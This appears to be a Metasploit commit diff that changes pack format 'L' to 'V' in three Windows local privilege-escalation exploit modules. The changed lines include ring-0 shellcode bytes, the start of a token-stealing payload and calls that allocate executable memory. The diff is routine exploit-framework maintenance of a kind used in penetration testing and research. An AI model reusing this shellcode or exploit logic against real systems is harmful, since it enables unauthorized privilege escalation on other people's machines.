Lands rapid7#3655, fixes pack operators

the commit.
he commit.

Author: HD Moore

modules/exploits/windows/local/mqac_write.rb

@@ -123,8 +123,8 @@ def exploit
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
-                                                    [0xffff].pack('L'),
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,
+                                                    [0xffff].pack('V'),
                                                     'MEM_COMMIT|MEM_RESERVE',
                                                     'PAGE_EXECUTE_READWRITE')
     end

modules/exploits/windows/local/ms_ndproxy.rb

@@ -90,15 +90,15 @@ module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In o
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('L')  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('L') # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
     ring0_shellcode
   end
 
   def fill_memory(proc, address, length, content)
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('L'), nil, [length].pack('L'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('V'), nil, [length].pack('V'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
     unless proc.memory.writable?(address)
       vprint_error('Failed to allocate memory')
       return nil

modules/exploits/windows/local/novell_client_nwfs.rb

@@ -79,7 +79,7 @@ def open_device(dev)
 
   def find_sys_base(drvname)
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@@ -98,8 +98,8 @@ def find_sys_base(drvname)
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
     tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
@@ -125,7 +125,7 @@ def ring0_shellcode(t)
 
   def fill_memory(proc, address, length, content)
 
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")